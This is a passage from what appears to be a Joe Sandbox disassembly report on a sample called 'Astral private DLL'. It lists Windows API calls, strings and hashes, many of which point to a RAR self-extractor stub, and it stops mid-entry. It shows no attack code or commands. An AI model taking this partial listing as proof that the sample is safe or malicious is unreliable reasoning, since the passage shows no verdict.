                                                                • Instruction ID: 8074b5a7b78f4714c8b2a1474ac396c340ac343b720df49fc63ae8611006e5ee
                                                                • Opcode Fuzzy Hash: 6521bcf6ee5fbcb50aeb4e8861dbefa9de65479397fdd12e7541708e098fc08d
                                                                • Instruction Fuzzy Hash: 5D41C134E00218AFCF15EF68C885A9EBBF5AF45328F148056E815AB392D731DB41CF91
                                                                APIs
                                                                • ShowWindow.USER32(?,00000000), ref: 00179EEE
                                                                • GetWindowRect.USER32(?,00000000), ref: 00179F44
                                                                • ShowWindow.USER32(?,00000005,00000000), ref: 00179FDB
                                                                • SetWindowTextW.USER32(?,00000000), ref: 00179FE3
                                                                • ShowWindow.USER32(00000000,00000005), ref: 00179FF9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Window$Show$RectText
                                                                • String ID: RarHtmlClassName
                                                                • API String ID: 3937224194-1658105358
                                                                • Opcode ID: 02b4719995264c4b8851d4f0bc0fbb5c9928a56b77e15cf34e00e01cfc889d49
                                                                • Instruction ID: f0a920a6ea32da0e32b011a95725f62fc13c4f382fd0463147a40c0d2ddfee42
                                                                • Opcode Fuzzy Hash: 02b4719995264c4b8851d4f0bc0fbb5c9928a56b77e15cf34e00e01cfc889d49
                                                                • Instruction Fuzzy Hash: 4041AF32104210AFDB21AF649C48F6BBFB8EF48701F08C559F8599A156DB34DA48CF61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                • API String ID: 176396367-3743748572
                                                                • Opcode ID: e2750ed3c2fe34d4ac62d6103adf4e88f09c80a88f3c6fbc0cde663995ee66f2
                                                                • Instruction ID: 3ca2113bba788c1a2baa83459f6854cd45db98a6a6306666164f76f6b64a9536
                                                                • Opcode Fuzzy Hash: e2750ed3c2fe34d4ac62d6103adf4e88f09c80a88f3c6fbc0cde663995ee66f2
                                                                • Instruction Fuzzy Hash: 6D315F72A4434566EA34BB549C42F7B73B4EB90720F60C41FF59A572C0FBA0AE4983A5
                                                                APIs
                                                                  • Part of subcall function 0018C868: _free.LIBCMT ref: 0018C891
                                                                • _free.LIBCMT ref: 0018C8F2
                                                                  • Part of subcall function 00188DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?), ref: 00188DE2
                                                                  • Part of subcall function 00188DCC: GetLastError.KERNEL32(?,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?,?), ref: 00188DF4
                                                                • _free.LIBCMT ref: 0018C8FD
                                                                • _free.LIBCMT ref: 0018C908
                                                                • _free.LIBCMT ref: 0018C95C
                                                                • _free.LIBCMT ref: 0018C967
                                                                • _free.LIBCMT ref: 0018C972
                                                                • _free.LIBCMT ref: 0018C97D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                • Instruction ID: 57f560d11c9394e37b7c0c464d9e08e5371fb8d3204a528723485f277bfbf92d
                                                                • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                • Instruction Fuzzy Hash: F61121715C0B04AAE520B7B1CC0BFCB7BAD9F25B00F804D15B29D66592EB75B6058FA0
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0017E669,0017E5CC,0017E86D), ref: 0017E605
                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0017E61B
                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0017E630
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                • API String ID: 667068680-1718035505
                                                                • Opcode ID: 39549e9652b556830aeb25bce8b8b1503f07b8d328133fab5e8b8feb06f0ccb8
                                                                • Instruction ID: faba84d1f2321148c3e5ec671aaee5a7fc3a2ab90f99e8afffb5831140fe9cfc
                                                                • Opcode Fuzzy Hash: 39549e9652b556830aeb25bce8b8b1503f07b8d328133fab5e8b8feb06f0ccb8
                                                                • Instruction Fuzzy Hash: C4F02B717C02226B5F225F755C84A6626F96B3E741B2584B9F90DE3501EB20CCA05B95
                                                                APIs
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001714C2
                                                                  • Part of subcall function 0016B146: GetVersionExW.KERNEL32(?), ref: 0016B16B
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001714E6
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00171500
                                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00171513
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00171523
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00171533
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Time$File$System$Local$SpecificVersion
                                                                • String ID:
                                                                • API String ID: 2092733347-0
                                                                • Opcode ID: 65da79fe405b79fdbdfa14bebb8514cb8e167464413bb491a0587ecee347ecc5
                                                                • Instruction ID: 2711843a383b4591b880f555ac04190c621f195f247409c0c52daf54b3269bb0
                                                                • Opcode Fuzzy Hash: 65da79fe405b79fdbdfa14bebb8514cb8e167464413bb491a0587ecee347ecc5
                                                                • Instruction Fuzzy Hash: F331EA75108345ABC704DFA8D88499BB7F8BF98714F04492EF599C3610E730D549CBA6
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,00182AF1,001802FC,0017FA34), ref: 00182B08
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00182B16
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00182B2F
                                                                • SetLastError.KERNEL32(00000000,00182AF1,001802FC,0017FA34), ref: 00182B81
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: c658d185e8a1eb0f25ce4ea87055414cae75ce31add635e9bc178f84ad366716
                                                                • Instruction ID: f282eaec7363b3daa51d81b64e2559aa07f27d1eefaf7716208147eb1cd84b6a
                                                                • Opcode Fuzzy Hash: c658d185e8a1eb0f25ce4ea87055414cae75ce31add635e9bc178f84ad366716
                                                                • Instruction Fuzzy Hash: 7401D83310A3116EE62A3AF4BC459267BD5EB11BB4764073BF520554E0EF624F80DB44
                                                                APIs
                                                                • GetLastError.KERNEL32(?,001A1030,00184674,001A1030,?,?,00183F73,00000050,?,001A1030,00000200), ref: 001897E9
                                                                • _free.LIBCMT ref: 0018981C
                                                                • _free.LIBCMT ref: 00189844
                                                                • SetLastError.KERNEL32(00000000,?,001A1030,00000200), ref: 00189851
                                                                • SetLastError.KERNEL32(00000000,?,001A1030,00000200), ref: 0018985D
                                                                • _abort.LIBCMT ref: 00189863
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_free$_abort
                                                                • String ID:
                                                                • API String ID: 3160817290-0
                                                                • Opcode ID: 3e8591bba314632bf59c1a4c4efdcf30fbf261536c38e8500d709c932dce7b6c
                                                                • Instruction ID: 1729ab9b7d406a9664393394731fb68cb0412e555014f67873726f06d4a229f8
                                                                • Opcode Fuzzy Hash: 3e8591bba314632bf59c1a4c4efdcf30fbf261536c38e8500d709c932dce7b6c
                                                                • Instruction Fuzzy Hash: C4F0A43614460667C6163364BC4AA3B2A668FF3771F2D0129F524A2692FF208B428F65
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0017DC47
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017DC61
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017DC72
                                                                • TranslateMessage.USER32(?), ref: 0017DC7C
                                                                • DispatchMessageW.USER32(?), ref: 0017DC86
                                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0017DC91
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                • String ID:
                                                                • API String ID: 2148572870-0
                                                                • Opcode ID: 9157a34e33d1abea00011b8d233d046d91e4e10401add9c2b5f91193ebaf07de
                                                                • Instruction ID: 67ff3f8b490eb38c0cd262c3462729fd74e042331fcb98923fc91d4da0967b42
                                                                • Opcode Fuzzy Hash: 9157a34e33d1abea00011b8d233d046d91e4e10401add9c2b5f91193ebaf07de
                                                                • Instruction Fuzzy Hash: 8DF04972A01219BBCB216BA5EC4DDCF7F7DEF427A1B048021F51AE2460D674D686CBB1
                                                                APIs
                                                                  • Part of subcall function 001705DA: _wcslen.LIBCMT ref: 001705E0
                                                                  • Part of subcall function 0016B92D: _wcsrchr.LIBVCRUNTIME ref: 0016B944
                                                                • _wcslen.LIBCMT ref: 0016C197
                                                                • _wcslen.LIBCMT ref: 0016C1DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_wcsrchr
                                                                • String ID: .exe$.rar$.sfx
                                                                • API String ID: 3513545583-31770016
                                                                • Opcode ID: 168724ad8aeb5163077a07470b04dbc077fc3cfb54e9c95da42d9518bdce37c6
                                                                • Instruction ID: a890d2efead63be0950df99294b4b472407dd7ff7a6d8711141e691c3de9f518
                                                                • Opcode Fuzzy Hash: 168724ad8aeb5163077a07470b04dbc077fc3cfb54e9c95da42d9518bdce37c6
                                                                • Instruction Fuzzy Hash: 00414826540312D5C736AF788C52A7BB3B8EF55744F14890EFDE6AB181EB604EA1C3D1
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000800,?), ref: 0017CE9D
                                                                  • Part of subcall function 0016B690: _wcslen.LIBCMT ref: 0016B696
                                                                • _swprintf.LIBCMT ref: 0017CED1
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                • SetDlgItemTextW.USER32(?,00000066,001A946A), ref: 0017CEF1
                                                                • EndDialog.USER32(?,00000001), ref: 0017CFFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                • String ID: %s%s%u
                                                                • API String ID: 110358324-1360425832
                                                                • Opcode ID: 9b3981e00218f4b5df5b288c60debf5f0b6a8cc87a9a660092f1742682d2543c
                                                                • Instruction ID: 8f40512e1dbddd4c8f32e08e7ee6bfd7d08ba91f8a8b253bc42fa684829d61af
                                                                • Opcode Fuzzy Hash: 9b3981e00218f4b5df5b288c60debf5f0b6a8cc87a9a660092f1742682d2543c
                                                                • Instruction Fuzzy Hash: 584130B1900259AADF259BA0DC45EEA77BCAF15340F40C0A6FA0DE7051EB709A849FA1
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0016BB27
                                                                • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0016A275,?,?,00000800,?,0016A23A,?,0016755C), ref: 0016BBC5
                                                                • _wcslen.LIBCMT ref: 0016BC3B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CurrentDirectory
                                                                • String ID: UNC$\\?\
                                                                • API String ID: 3341907918-253988292
                                                                • Opcode ID: b6edea439869a67d8ee3254de9c66ffd93469cfdacdb6ab6469e7ab261940f9e
                                                                • Instruction ID: dc1657fc3cf23162a83e927bcd15b35280cd1c116804c65a3a375a9ca23b4d94
                                                                • Opcode Fuzzy Hash: b6edea439869a67d8ee3254de9c66ffd93469cfdacdb6ab6469e7ab261940f9e
                                                                • Instruction Fuzzy Hash: F7419F31444216A6CF21AF60CC81EEE7BBDAF55394F158466F868E3151EB70DBE08B60
                                                                APIs
                                                                • LoadBitmapW.USER32(00000065), ref: 0017B6ED
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0017B712
                                                                • DeleteObject.GDI32(00000000), ref: 0017B744
                                                                • DeleteObject.GDI32(00000000), ref: 0017B767
                                                                  • Part of subcall function 0017A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0017B73D,00000066), ref: 0017A6D5
                                                                  • Part of subcall function 0017A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A6EC
                                                                  • Part of subcall function 0017A6C2: LoadResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A703
                                                                  • Part of subcall function 0017A6C2: LockResource.KERNEL32(00000000,?,?,?,0017B73D,00000066), ref: 0017A712
                                                                  • Part of subcall function 0017A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0017B73D,00000066), ref: 0017A72D
                                                                  • Part of subcall function 0017A6C2: GlobalLock.KERNEL32(00000000), ref: 0017A73E
                                                                  • Part of subcall function 0017A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0017A762
                                                                  • Part of subcall function 0017A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0017A7A7
                                                                  • Part of subcall function 0017A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0017A7C6
                                                                  • Part of subcall function 0017A6C2: GlobalFree.KERNEL32(00000000), ref: 0017A7CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                • String ID: ]
                                                                • API String ID: 1797374341-3352871620
                                                                • Opcode ID: 169520850e8895e218c94406b359a5332895db9462faefb5e83fbbb7ee796e7d
                                                                • Instruction ID: a38b1b500681f5250420dc8ec6a5dc981fe27706f11410e812edaae205efe98d
                                                                • Opcode Fuzzy Hash: 169520850e8895e218c94406b359a5332895db9462faefb5e83fbbb7ee796e7d
                                                                • Instruction Fuzzy Hash: 2A01F136940215A7C71277749C89FBF7ABAAFC0B52F098011F918A72D1DF31CD5942A2
                                                                APIs
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • EndDialog.USER32(?,00000001), ref: 0017D64B
                                                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0017D661
                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0017D675
                                                                • SetDlgItemTextW.USER32(?,00000068), ref: 0017D684
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: ItemText$DialogWindow
                                                                • String ID: RENAMEDLG
                                                                • API String ID: 445417207-3299779563
                                                                • Opcode ID: 0fd03256d9aba1ca4c4dc11bcceaeefdcbe19f2d3f932bf1419c79b6f2326f3d
                                                                • Instruction ID: d134bd6329ebd3dae6acb15aae22ed8145eb8597c769093acc654c5002565df9
                                                                • Opcode Fuzzy Hash: 0fd03256d9aba1ca4c4dc11bcceaeefdcbe19f2d3f932bf1419c79b6f2326f3d
                                                                • Instruction Fuzzy Hash: DE01283328421CBAD2115F64AE0AF577F7DEF5AB01F118114F309A24D1C7A2DA459775
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00187E24,00000000,?,00187DC4,00000000,0019C300,0000000C,00187F1B,00000000,00000002), ref: 00187E93
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00187EA6
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00187E24,00000000,?,00187DC4,00000000,0019C300,0000000C,00187F1B,00000000,00000002), ref: 00187EC9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 37c89b63b307bcb18b0fe25786c8d06d5b82aa7f629962f5c3e99bce1e24ef2a
                                                                • Instruction ID: 3876b1f00282bc5e1b4cfef859a57a12ff81b7b3797307b39023552996da66ec
                                                                • Opcode Fuzzy Hash: 37c89b63b307bcb18b0fe25786c8d06d5b82aa7f629962f5c3e99bce1e24ef2a
                                                                • Instruction Fuzzy Hash: 13F06835904208BBCB119FE0DC09B9EBFB4EF44711F1440AAF815A3190DB319F80CB90
                                                                APIs
                                                                  • Part of subcall function 0017081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00170836
                                                                  • Part of subcall function 0017081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016F2D8,Crypt32.dll,00000000,0016F35C,?,?,0016F33E,?,?,?), ref: 00170858
                                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0016F2E4
